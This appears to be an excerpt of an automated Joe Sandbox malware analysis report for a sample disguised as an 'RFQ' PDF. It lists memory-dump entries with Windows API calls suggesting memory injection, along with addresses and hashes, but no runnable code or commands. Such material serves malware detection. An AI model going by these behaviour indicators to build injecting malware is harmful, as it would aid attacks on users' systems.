                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 020BBAE2: LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateLibraryLoadMemoryVirtual
                              • String ID:
                              • API String ID: 2616484454-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 020BBAE2: LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateLibraryLoadMemoryVirtual
                              • String ID:
                              • API String ID: 2616484454-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnumWindows
                              • String ID: \ %.
                              • API String ID: 1129996299-2901931214
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnumWindows
                              • String ID: \ %.
                              • API String ID: 1129996299-2901931214
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnumWindows
                              • String ID: \ %.
                              • API String ID: 1129996299-2901931214
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileA.KERNELBASE(?,380C6702), ref: 020B92BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileA.KERNELBASE(?,380C6702), ref: 020B92BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileA.KERNELBASE(?,380C6702), ref: 020B92BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE ref: 020B8F3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE ref: 020B8F3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE ref: 020B8F3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileA.KERNELBASE(?,380C6702), ref: 020B92BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE ref: 020B8F3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryProtectVirtual
                              • String ID: 7U%o$Oqc"
                              • API String ID: 3389902171-3960296939
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7U%o$Oqc"
                              • API String ID: 0-3960296939
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !5]
                              • API String ID: 0-1504148834
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c9a06fafa97e999e1af794eb6ade82ee1f65b68b3ff3ff1833aeca38a60417bd
                              • Instruction ID: a94ebef660572a473cde8defe2783d78e0a853b50441d6996297706365c75c04
                              • Opcode Fuzzy Hash: c9a06fafa97e999e1af794eb6ade82ee1f65b68b3ff3ff1833aeca38a60417bd
                              • Instruction Fuzzy Hash: 23910D7160438ADFDB799E25CD51BEE77E2AF49340F41842EDD8AAB210E7344A40DF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 395f74b05f67caf603d355fe9256e5cffc57ebe9ad0cb5ebdfefd1b679c12fcd
                              • Instruction ID: 002d6ccc6b63f95c4505c86e9e4deedda8e2bc1f2a82706ebddaebc603b56bf2
                              • Opcode Fuzzy Hash: 395f74b05f67caf603d355fe9256e5cffc57ebe9ad0cb5ebdfefd1b679c12fcd
                              • Instruction Fuzzy Hash: 9191EE7150838ADFDF7A8E25CD51BEE77A2AF45340F05842EDD8AAB211E7354A40EF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a46365ea97e282451e50a3e0b858921ab48780ddd64a3a6a387ffe38c76d6b7f
                              • Instruction ID: d7eda0e129d1b96df68c685d149bdb02590892b715ef43f14896741758f4c210
                              • Opcode Fuzzy Hash: a46365ea97e282451e50a3e0b858921ab48780ddd64a3a6a387ffe38c76d6b7f
                              • Instruction Fuzzy Hash: F681FF71608389DFDB7A8E25CE51BEE77E5AF45340F01442EDE8AAB210E7344A40DF56
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 19070f7e61629d9b2234380c0ced58887fcf6dbd3b5515961f38ded04fb0954c
                              • Instruction ID: 4c36a4614a48661ddc8b06e7634d6e0adc3e3bfd8beeb91f195bab5726aa741f
                              • Opcode Fuzzy Hash: 19070f7e61629d9b2234380c0ced58887fcf6dbd3b5515961f38ded04fb0954c
                              • Instruction Fuzzy Hash: 99810071604389DFDB7A8E25CD51BEE77E5AF4A340F01442EDE8A9B210E3345A40DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a856c0dbee9d3fe68629c3e0db3837aa670258033124061c7fc4b8d23fa985f5
                              • Instruction ID: 7bae01bf68a0d94cfc5591c1cdf5a18f51d3328670d4cebcff0b106723c4ae22
                              • Opcode Fuzzy Hash: a856c0dbee9d3fe68629c3e0db3837aa670258033124061c7fc4b8d23fa985f5
                              • Instruction Fuzzy Hash: 97811F71508389DFDB7A8E25CE51BEE77E5AF05340F05442EDE8A9B211E7344A40DF22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ba366ca89b687f8a60292c010f85fad4069e94e98c2843f3c3c6df51e75a18c
                              • Instruction ID: b687cdb335611bc9385f4fda3d42448f54fb88c8efe3ebcffdc888f94cdf7ed9
                              • Opcode Fuzzy Hash: 7ba366ca89b687f8a60292c010f85fad4069e94e98c2843f3c3c6df51e75a18c
                              • Instruction Fuzzy Hash: 8581F071608389DFDB7A8E25CE51BEE77E2AF45340F01442EDE8AAB210E7345A40DF56
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3390788bd43013246b90be2dd7708bdd4e3c31e657f1fa1c50deb87c6551d3da
                              • Instruction ID: 75bae2fc61c70b8c7b675a35afc0633ca386ec8929f18c6c118b406a181abf53
                              • Opcode Fuzzy Hash: 3390788bd43013246b90be2dd7708bdd4e3c31e657f1fa1c50deb87c6551d3da
                              • Instruction Fuzzy Hash: CB81FF31608389DFDB7A8E25CE51BEE77B5AF49340F01442EDE8A9B250E3354A41DF22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2a4e99905ae2c9a091dbeabd8862551064fe2d83c522bd9ac5d96586bf40a629
                              • Instruction ID: 8da5e5bf7e4cf74730339395aa125887a8331f6d52de88ed09341cfee7352138
                              • Opcode Fuzzy Hash: 2a4e99905ae2c9a091dbeabd8862551064fe2d83c522bd9ac5d96586bf40a629
                              • Instruction Fuzzy Hash: 56810171504389DFDB7A8E25CD51BEE77E1AF45340F05442EDD8A9B210E3344A40DF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a5b3a117350cc31f23a65c71d03fcfbe106c93e47cda00d3cd4d52f762f40bb8
                              • Instruction ID: 3ae0f7ba4fa51c53ea3badf6bbafb843d77ebd6a9e078153e92e020084ae81ed
                              • Opcode Fuzzy Hash: a5b3a117350cc31f23a65c71d03fcfbe106c93e47cda00d3cd4d52f762f40bb8
                              • Instruction Fuzzy Hash: EF810F71504389DFDB7A8E25CE51BEE77E6AF45340F05442EDE8AAB210E3344A40DF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cbb04586848e991265a21274e8ab07bfb40b21d04529285ae34652ce55a5f660
                              • Instruction ID: 9b9582a99575ae607210cc563ea8beb134fada24d649aa7629cdd88e1f4ff1bc
                              • Opcode Fuzzy Hash: cbb04586848e991265a21274e8ab07bfb40b21d04529285ae34652ce55a5f660
                              • Instruction Fuzzy Hash: AC81FF31608389DFDB7A8E25CE51BEE77A6AF45340F01442EDD8A9B210E3345A41DF56
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
